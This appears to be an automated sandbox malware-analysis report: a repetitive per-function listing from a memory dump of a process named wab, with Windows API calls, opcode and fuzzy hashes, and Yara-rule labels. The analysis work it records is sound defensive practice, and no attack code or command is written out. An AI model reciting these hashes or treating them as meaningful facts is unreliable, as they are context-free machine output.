                                                                                                                                                                                                                      • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7600DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7600DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4284152360-0
                                                                                                                                                                                                                      • Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                      • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4284152360-0
                                                                                                                                                                                                                      • Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                      • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                      • String ID: d=E
                                                                                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                                                                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: F^@
